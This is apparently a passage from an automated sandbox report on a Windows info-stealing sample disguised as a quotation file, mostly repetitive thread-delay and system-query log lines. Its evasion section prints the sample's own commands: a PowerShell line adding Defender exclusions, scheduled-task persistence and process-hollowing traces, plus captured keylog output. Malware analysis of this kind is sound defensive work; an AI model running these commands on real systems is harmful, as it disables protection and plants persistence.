                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 596593
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 596484
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 596375
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 596265
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 596156
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 596046
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 595934
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 595828
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 595718
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 595609
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 595500
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 595390
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 595281
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 595171
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 595062
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 594953
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 594839
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 594734
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 594625
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7917
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1660
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7848
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1809
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Window / User API: threadDelayed 3835
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Window / User API: threadDelayed 6006
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Window / User API: threadDelayed 2702
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Window / User API: threadDelayed 7150
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Window / User API: threadDelayed 5038
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Window / User API: threadDelayed 3268
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Window / User API: threadDelayed 2671
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Window / User API: threadDelayed 7188
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Last function: Thread delayed
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 596297Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 596187Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 596078Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 595968Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 595859Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 595749Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 595639Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 595531Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 595410Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 595279Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 595169Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 594864Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 594734Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 594585Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 594468Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 594359Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 594244Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 594125Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 594015Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 599859
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 599750
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 599640
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 599531
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 599421
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 599312
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 599203
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 599093
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 598984
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 598874
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 598726
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 598609
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 598499
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 598390
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 598281
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 598171
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 598059
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 597953
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 597843
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 597317
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 597165
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 597049
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 596921
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 596812
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 596697
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 596574
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 596468
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 596302
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 596171
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 596062
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 595949
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 595843
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 595734
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 595624
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 595515
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 595406
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 595268
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 595146
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 594450
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 594343
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 594234
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 594125
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 594015
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 593906
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 593794
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 593687
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 593578
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 593464
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 593310
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599890
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599768
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599640
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599454
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599328
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599217
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599109
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599000
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598890
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598781
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598671
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598562
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598453
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598343
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598234
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598125
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598015
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597906
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597796
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597687
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597578
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597468
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597359
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597250
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597140
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597031
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596921
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596812
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596703
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596593
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596484
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596375
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596260
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596142
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596015
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595905
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595791
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595679
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595575
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595468
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595358
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599875
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599765
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599654
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599547
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599437
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599327
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599218
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599109
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598994
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598890
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598781
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598668
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598562
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598453
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598339
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598234
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598125
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598015
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597906
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597797
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597687
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597578
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597468
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597359
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597250
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597140
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597031
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596915
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596812
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596703
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596593
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596484
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596375
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596265
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596156
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596046
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595934
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595828
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595718
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595609
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595500
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595390
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595281
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595171
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595062
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594953
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594839
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594734
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594625
                    Source: rQuotation3200025006.exe, 00000008.00000002.4158424515.0000000000F54000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO
                    Source: sgxIb.exe, 0000001C.00000002.4158194442.000000000181E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllf
                    Source: pBBqGOzrz.exe, 0000000E.00000002.4157797826.000000000168A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll?
                    Source: sgxIb.exe, 00000016.00000002.1959190035.00000000015C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll$
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Process token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rQuotation3200025006.exe"
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pBBqGOzrz.exe"
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Memory written: C:\Users\user\Desktop\rQuotation3200025006.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Memory written: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Memory written: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp3D2.tmp"
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Process created: C:\Users\user\Desktop\rQuotation3200025006.exe "C:\Users\user\Desktop\rQuotation3200025006.exe"
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp1AB5.tmp"
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Process created: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe "C:\Users\user\AppData\Roaming\pBBqGOzrz.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp4705.tmp"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Process created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp6606.tmp"
                    Source: rQuotation3200025006.exe, 00000008.00000002.4163306810.0000000002D3B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $^q3<b>[ Program Manager]</b> (27/09/2024 22:02:17)<br>
                    Source: rQuotation3200025006.exe, 00000008.00000002.4163306810.0000000002D3B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
                    Source: rQuotation3200025006.exe, 00000008.00000002.4163306810.0000000002D9C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: <html>Time: 10/15/2024 03:01:59<br>User Name: user<br>Computer Name: 849224<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br>IP Address: 8.46.123.33<br><hr><b>[ Program Manager]</b> (27/09/2024 22:02:17)<br>{Win}r</html>
                    Source: rQuotation3200025006.exe, 00000008.00000002.4163306810.0000000002D3B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^q
                    Source: rQuotation3200025006.exe, 00000008.00000002.4163306810.0000000002D3B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $^q8<b>[ Program Manager]</b> (27/09/2024 22:02:17)<br>{Win}THcq
                    Source: rQuotation3200025006.exe, 00000008.00000002.4163306810.0000000002D3B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $^q9<b>[ Program Manager]</b> (27/09/2024 22:02:17)<br>{Win}rTHcq
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Queries volume information: C:\Users\user\Desktop\rQuotation3200025006.exe VolumeInformation
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
